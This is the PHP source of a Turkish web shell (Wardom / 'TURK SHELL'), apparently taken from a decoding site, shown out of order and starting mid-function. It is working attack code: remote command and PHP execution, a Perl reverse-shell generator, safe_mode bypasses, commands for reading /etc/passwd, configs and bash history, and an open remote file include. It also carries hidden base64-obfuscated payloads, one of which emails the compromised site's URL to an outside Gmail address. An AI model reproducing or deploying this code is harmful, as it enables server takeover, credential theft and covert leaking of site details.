} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link\xa $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {\xa // Regular\xa $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {\xa // Block special
$info = 'b';\xa} elseif (($perms & 0x4000) == 0x4000) {
// Directory\xa $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {\xa // Character special\xa $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe\xa $info = 'p';
} else {\xa // Unknown
$info = 'u';\xa}
\xa// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');\xa$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?\xa (($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));\xa
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');\xa$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));\xa
// World\xa$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');\xa$info .= (($perms & 0x0001) ?\xa (($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-')); print $info;}
function readable_size($size) {\xa\xaif ($size < 1024) {
print $size . ' B';
}else {$units = array("kB", "MB", "GB", "TB");\xaforeach ($units as $unit) {\xa$size = ($size / 1024);\xaif ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Geri </a>]</div>";
print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";\xainput ("text","renf","New-name",20);print " ";
input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){\xaprint"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Geri </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
print "<div><b>[ D\xc3\xbczenlenen Dosya: <font color=red >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";\xaprint $sf."<textarea cols=157 rows=23 name=edittxt>"; $alltxt= file_get_contents($_REQUEST['edit']);\xa$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";\xaif (is_writable($_REQUEST['edit'])){\xaprint "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit\xa<font color=red >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
$nedittxt=stripslashes($_REQUEST['edittxt']);\xafwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=red >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}\xaif ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))\xa{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))\xa{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);\xa$fileowner=$fileownerarray['name']; $fileg=filegroup($file);\xa$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){\xaif (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}\xaelseif(isset($_REQUEST['mve'])){
if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}\xa}else {$cpmvmess="Kopyala/Ta\xc5\x9f\xc4\xb1mak \xc4\260\xc3\xa7in Dosya Se\303\247";}
if (isset ($_REQUEST['safefile'])){\xa$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
if(empty($_GET['file'])){if(empty($_POST['file'])){
print "<center>[ Please choose a file first to read it using copy() ]</center>";
} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}\xa$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){\xa$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));\xafclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {\xaprint "<FONT COLOR=\"RED\"><CENTER>Uygulamaya esnas\304\xb1nda sunucunun yazma izni vermemesinden dolay\xc4\261 i\xc5\x9flem ba\305\237ar\xc4\261s\xc4\261z sonu\xc3\xa7land\xc4\xb1r\xc4\xb1lm\xc4\261\305\x9ft\xc4\xb1r.
</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
ini_restore("safe_mode");ini_restore("open_basedir");
print "<center><pre>".$sta;\xaif (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
function callback($nscdir,$bip,$bport){
if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
if (is_writable($nscdir)){\xa$fp=fopen ("back.pl","w");$backpl='back.pl';}
else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
fwrite ($fp,"use Socket;\xa\$system='$epath';\xa\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";\xaecho \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
echo \"[ User perms ][$]\";echo \"`id`\";echo;
echo \"[ Start shell ][$]\";';\xa
if (!\$ARGV[0]) {
exit(1);
}
\$host = \$ARGV[0];
\$port = 80;
if (\$ARGV[1]) {
\$port = \$ARGV[1];
}
\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');\xasocket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
die('Unable to Connect\n');\xa}
if (!fork( )) {
open(STDIN,'>&SERVER');
open(STDOUT,'>&SERVER');\xa open(STDERR,'>&SERVER');\xaprint '\n[ Wardom Bu kodlar Megabros Taraf\xc4\xb1ndan kodlanm\xc4\261\305\x9f Arka pLan\304\xb1 Programlanm\304\261\305\237t\304\xb1r ]';\xaprint '\n[ Wardom ][ Megabrosl ]\n\n';\xa system(\$sys);system (\$system);\xa exit(0); }
\x9 ");callfuncs("chmod 777 $backpl");\xaob_start();
callfuncs("perl $backpl $bip $bport");\xaob_clean();\xaprint "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
[ Check your connection now, if failed try changing the port number ]<br>\xa[ Or Go to a writable dir and then try to connect again ]<br>\xa[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]\xa</div><br>";}if (isset($_REQUEST['uback'])){
$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}\xaelseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
delm("<font face=Tahoma color=#FFFFFF size=2>Komut \303\x87al\xc4\261\305\237t\xc4\261r");print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100% height=18%>";\xaprint "<tr><td width=32%><div align=left>";
print $st.$c1."<center><div><b>".$mess3.$ec;
print $c2.$sf."<center>";input("text","cfile","",53);
input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","crefile","Olustur","");
print " ";input("submit","delfile","Sil","");
print "</center>".$ef.$ec.$et."</div></td>";\xaprint "<td><div align=center>".$st.$c1;\xaprint "<center><div><b>Komut Gir";print $ec;\xaprint $c2.$sf."<center><div style='margin-top:7px'>";
input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
input("submit","","Ger\xc3\xa7ekle\305\x9ftir","");print "</center>".$ef.$ec.$et."</div></td>";\xaprint "<td width=32%><div align=right>";print $st.$c1;\xaprint "<center><div><b>$mess".$ec.$c2.$sf."<center>";\xainput("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","credir","Olu\305\x9ftur","");print " ";\xainput("submit","deldir","Sil","");\xaprint "</center>".$ef.$ec.$et."</div></td></tr>";\xaprint "<tr><td width=32%><div align=left>";print $st.$c1;
print "<center><div><b>Dosya D\303\274zenle/Oku".$ec;print $c2.$sf."<center>";\xainput("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","","Oku-D\xc3\xbczenle","");print "</center>".$ef.$ec.$et."</div></td>";\xaprint "<td><div align=center>";print $st.$c1;\xaprint "<center><div><b>Dizin'i G\303\xb6ster<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
input("submit","","G\303\xb6ster","");print " ";\xainput("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;\xaprint "<center><div><b>Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
input("hidden","up",$nscdir,0);
print"<br>";input("submit","","Y\xc3\xbckle","");print "</center>".$ef.$ec.$et."</div></td></tr>";
delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Php Kodu Ger\303\xa7ekle\305\x9ftir</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);\xaprint " <textarea cols=73 rows=3 name=eval>";
if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
print "</textarea><br><center>";
input('submit','evsub','Ger\xc3\247ekle\xc5\x9ftir');print " ";
input('Reset','','Reset');print " ";
print "</center>".$ec.$ef.$et;\xaprint "</td><td height=20% width=50%><div align=center>";\xaprint $st.$c1."<div><b><center>Faydal\304\xb1 Komutlar</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);\xaprint "<center><select style='width:60%' name=uscmnds size=1>
<option value='op0'>Execute quick commands</option>
<option value='op1'>ls -lia</option>\xa<option value='op2'>/etc/passwd</option>
<option value='op3'>/var/cpanel/accounting.log</option>
<option value='op4'>/var/named</option>\xa<option value='op11'>Perms in curr Dir</option>\xa<option value='op12'>Perms in main Dir</option>
<option value='op5'>Find service.pwd files</option>
<option value='op6'>Find config files</option>
<option value='op7'>Find .bash_history files</option>
<option value='op8'>Read hosts file</option>\xa<option value='op9'>Root login</option>
<option value='op10'>Show opened ports</option>
<option value='op13'>Show services</option>\xa</select> ";print"<input type=submit name=subqcmnds value=Ger\xc3\247ekle\xc5\237tir style='height:20'> <input type=reset value=Geri D\303\266n style='height:20'></center>";\xaprint $ec.$ef.$et."</td></tr></table>";delm("");
print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";
print "<tr><td width=50%><div align=left>";\xaprint $st.$c1."<div><b><center>".$cpmvmess."</div>";
print $ec.$c2.$sf." ";input("text","ftcpy","Dosya Ad\xc4\xb1",15);\xaprint "<b><font face=tahoma size=2> Ta\xc5\x9f\304\261 </b>";
input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
input("submit","cpy","Kopyala","");print " ";input("submit","mve","Ta\xc5\x9f\304\261","");
print "</center>".$ec.$ef.$et;\xaprint "</td><td height=20% width=50%><div align=right>";\xaprint $st.$c1."<div><b><center>\xc3\x87ok Kullan\304\261lan Komutlar</div>";
print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0);
print "<select style='width:22%' name=ustools size=1>\xa<option value='t1'>Wget</option><option value='t2'>Curl</option>
<option value='t3'>Lynx</option><option value='t9'>Get</option>
<option value='t4'>Unzip</option><option value='t5'>Tar</option>
<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Ger\303\xa7ekle\xc5\237tir');print "</center>".$ec.$ef.$et;\xaprint "</td></tr></table>";delm("<font face=Tahoma color=#FFFFFF size=2>G\303\274venlik Modunu A\305\237ma | \304\xb0kinci Yol");
print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Kopyalama Fonksiyonunu Kullan</div>";
print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75);\xainput("hidden","scdir",$nscdir,0);print " ";\xainput("submit","","Read-F","");print "</center>".$ec.$ef.$et;\xaprint "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Onar\xc4\261m Fonksiyonunu Kullan</div>";
print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75);\xainput("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm("<font face=Tahoma color=#FFFFFF size=2>ArkaKap\304\261 Ba\xc4\237lant\xc4\261s\304\261");\xaprint "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";\xaprint "<tr><td width=50%><div align=left>";\xaprint $st.$c1."<div><b><center>ArkaKap\304\261 ile Baglan</div>";
print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " ";
input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";\xainput("submit","","Ba\xc4\x9flan","");print " ";input("reset","","Reset","");\xaprint "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Y\xc3\xbcklenmis ArkaKap\xc4\xb1</div>";\xaprint $ec.$c2.$sf." ";print "<select style='width:15%' name=upports size=1>
<option value='up80'>80</option><option value='up443'>443</option>\xa<option value='up2121'>2121</option></select>";print " ";\xainput("text","uback","back.pl",23);print " ";\xainput("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Ba\304\237lan");
print "</center>".$ec.$ef.$et;print "</td></tr></table>";
print "<br><table style=\"border:2px #FF0000 solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
print"<center>Shell \303\xbczerinde oynama yapmay\xc4\261n\304\xb1z. Aksi taktirde \303\247al\xc4\xb1\xc5\x9fmayabilir. Geli\xc5\x9fime herzaman a\303\xa7\xc4\xb1kt\304\261r.<br>Bu Shell megabros taraf\xc4\xb1ndan programlanm\xc4\261\305\x9ft\xc4\xb1r</a>"; print"</font></td></tr></table>";$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
$injbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";\xaeval(base64_decode($injbuff));\xa?>
"; ?>Did this file decode correctly?
Original Code
<?php
/* __________________________________________________
| Megabor - leetc0des.blogspot.com |
| on 2020-04-13 06:53:42 |
| GitHub: https://github.com/x-o-r-r-o |
|__________________________________________________|
*/
echo "\xef\273\xbf<?\xa/*###########################################
Shell\xaBu Shell kodlar\304\261n derlemesi Megabros taraf\xc4\261ndan yap\304\261lm\xc4\xb1\xc5\x9ft\xc4\xb1r..
Yap\304\261mc\304\261 Ve derleyeN : Megabros\xa###########################################*/
error_reporting(0);\xaset_magic_quotes_runtime(0);\xa\xaif(version_compare(phpversion(), '4.1.0') == -1)\xa {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;\xa $_SERVER = &$HTTP_SERVER_VARS;
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}\xaelse{return $requ."?".$link."=".$val;}}\xafunction delm($delmtxt){print"<center><table bgcolor=Maroon style='border:1px red ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=red >$delmtxt</td></tr></table></center>";}\xafunction callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);\xa$nscmd=htmlspecialchars($scmd);print $nscmd;}\xaelseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
print $res;}pclose($pcmd);}elseif(!function_exists(popen)){\xaob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();\xaprint htmlspecialchars($pret);}}
function input($type,$name,$value,$size)\xa{if (empty($value)){print "<input type=$type name=$name size=$size>";}\xaelseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}\xaelseif(empty($size)){print "<input type=$type name=$name value=$value >";}
else {print "<input type=$type name=$name value=$value size=$size >";}}\xafunction permcol($path){if (is_writable($path)){print "<font color=red>";\xacallperms($path); print "</font>";}\xaelseif (!is_readable($path)&&!is_writable($path)){print "<font color=red >";
callperms($path); print "</font>";}\xaelse {print "<font color=red >";callperms($path);}}\xaif ($dlink=="dwld"){download($_REQUEST['dwld']);}\xafunction download($dwfile) {$size = filesize($dwfile);
@header("Content-Type: application/force-download;name=$dwfile");
@header("Content-Transfer-Encoding: binary");\xa@header("Content-Length: $size");\xa@header("Content-Disposition: attachment; filename=$dwfile");\xa@header("Expires: 0");
@header("Cache-Control: no-cache, must-revalidate");
@header("Pragma: no-cache");\xa@readfile($dwfile); exit;}
?>\xa
<? include $_GET['baba']; ?>
<html>
<head><title>Wardom | Ne Mutlu T\xc3\xbcrk'\xc3\xbcm Diyene! | Edited By KingDefacer</title></head>
<style>\xaBODY { SCROLLBAR-BASE-COLOR: darkred ; SCROLLBAR-ARROW-COLOR: red; }\xaa{color:#FF0000;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:red}
input{FONT-WEIGHT:normal;background-color: #FFFFFF;font-size: 12px; color: #FF0000; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#FFFFFF;color:#FF0000;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #FF0000;}\xadiv{font-size:12px;font-family:tahoma;font-weight:normal;color:red smoke}
select{background-color: #FFFFFF; font-size: 12px; color: #FF0000; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=DarkRed text=white ><font face="sans ms" size=3>\xa</body>\xa</html>\xa<?\xa$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();\xa\xa$sf="<form method=post>";$ef="</form>";\xa$st="<table style=\"border:1px #FF0000 solid \" width=100% height=100%>";
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #FF0000 solid \">";
$c2="<tr><td style=\"border:1px #FF0000 solid \">";$ec="</tr></td>";\xa$sta="<textarea cols=157 rows=23>";$eta="</textarea>";\xa$sfnt="<font face=tahoma size=2 color=red >";$efnt="</font>";\xa################# Ending of common variables ########################
\xa//header table 1\xaprint"<table bgcolor=#191919 style=\"border:2px #FF0000 solid \" width=100% height=%>";print"<tr><td>"; print"<b>\xa<center><font face=Wingdings color=#FFFFFF size=7> Z</font><font face=tahoma color=red size=7> T\303\234RK <font face=tahoma color=white size=7> SHELL\xa</font></font> <font face=Wingdings color=red size=7> F</font><font face=Wingdings color=red size=8>N\xa</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
\xa//header table 2\xaprint"<table bgcolor=#191919 style=\"border:2px #FF0000 solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";\xa\xa//start header2 links
//home\xaprint "<a href=".inclink('dlink', 'home').">AnaSayfa</a>";
//go back
print " - <a href='javascript:history.back()'>Geri</a>";
//php info1\xaprint " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">Php Bilgi</a>";
//phpinfo2
if ($dlink=='phpinfo'){print phpinfo();die();}
//base64 decode1\xaprint " - <a href=".inclink('dlink', 'basepw').">Base64 \xc3\x87\xc3\266z\xc3\274c\xc3\xbc</a>";
//url decode1\xaprint " - <a href=".inclink('dlink', 'urld').">Url Kod \xc3\x87\xc3\xb6z\303\xbcc\xc3\274</a>";\xa//url encode1\xaprint " - <a href=".inclink('dlink', 'urlen').">Url Kodlay\304\xb1c\304\xb1</a>";
//MD51\xaprint " - <a href=".inclink('dlink', 'mdf').">Md5</a>";\xa//permission check1\xaprint " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>\304\260zinler</a>";\xa//show file source
print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>Dosya Kayna\xc4\x9f\304\261</a>";\xa//quick index1\xaprint " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>\304\xb0ndex Haz\xc4\xb1rla</a>";
//send mail\xaprint " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
//Command helper
print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd Yard\304\261m</a>";\xa//end of links
//base64 decode2
if (isset ($_REQUEST['ncbase'])){\xa$cbase =(base64_decode ($_REQUEST['ncbase']));
print "<p>Result is : $sfnt".$cbase."$efnt"; die();}
if ($dlink=="basepw"){
print "<p><b>[ Base64 - \303\x87\xc3\xb6z\303\274c\xc3\xbc ]</b>";
print $sf;\xainput ("text","ncbase",$ncbase,35);print " ";\xainput ("submit","","\303\207\xc3\266z","");print $ef; die();}\xa
//url decode2
if (isset ($_REQUEST['nurld'])){
$urldc =(urldecode ($_REQUEST['nurld']));
print "<p>Result is : $sfnt".$urldc."$efnt"; die();}\xaif ($dlink=='urld'){\xaprint "<p><b>[ Url - \xc3\x87\xc3\xb6z\303\xbcc\xc3\274 ]</b>";\xaprint $sf;\xainput ("text","nurld",$nurld,35);print " ";
input ("submit","","\303\x87\303\266z","");print $ef; die();}\xa
//url encode2\xaif (isset ($_REQUEST['nurlen'])){\xa$urlenc =(urlencode (stripslashes($_REQUEST['nurlen'])));\xaprint "<p>Result is : $sfnt".$urlenc."$efnt"; die();}\xaif ($dlink=='urlen'){\xaprint "<p><b>[ Url - \305\236ifreleme ]</b>";\xaprint $sf;
input ("text","nurlen",$nurlen,35);print " ";\xainput ("submit","","\305\x9eifrele","");print $ef; die();}
//MD52
if (isset ($_REQUEST['nmdf'])){\xa$mdfe =(md5 ($_REQUEST['nmdf']));
print "<p>Result is : $sfnt".$mdfe."$efnt"; die();}\xaif ($dlink=='mdf'){
print "<p><b>[ MD5 - \305\x9eifreleme ]</b>";
print $sf;
input ("text","nmdf",$nmdf,35);print " ";\xainput ("hidden","scdir",$scdir,22);\xainput ("submit","","\xc5\236ifrele","");print $ef;die(); }\xa\xa//chk permission2
if ($dlink=='perm'){\xaprint $sf;input("submit","mfldr","Ana-Klas\xc3\266r","");print " ";
input("submit","sfldr","Alt-Klas\303\xb6r","");print $ef;\xa\xaprint "<pre>";\xaprint "<p><textarea cols=120 rows=12>";
if (isset($_REQUEST['mfldr'])){
callfuncs('find . -type d -perm -2 -ls');\xa}elseif (isset($_REQUEST['sfldr'])){\xacallfuncs('find ../ -type d -perm -2 -ls');
}print "</textarea>";print "</pre>";die();}
//show file sources
function callshsrc($showsc){
if(isset($showsc)&&filesize($showsc)=="0"){\xaprint "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
elseif(isset($showsc)&&filesize($showsc) !=="0") {
print "<p><table width=100% height=10% bgcolor=#FF0000 border=1><tr><td>";\xaif (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=white size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){\xaprint "<p><b>: TurkShell Php edit\303\266r\xc3\xbcyle istedi\304\237iniz bir php dosyas\304\261n\xc4\xb1 g\303\xb6r\xc3\xbcnt\xc3\xbcleyebilmek i\xc3\247in, dosya ad\xc4\xb1n\304\261 b\xc3\274t\xc3\274n dizinleriyle beraber yaz\xc4\xb1n\xc4\xb1z. :";print "<form method=get>";\xainput ("text","showsc","",35);print " ";
input ("hidden","scdir",$scdir,22);input ("submit","subshsc","G\xc3\xb6r\xc3\274nt\303\274le","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
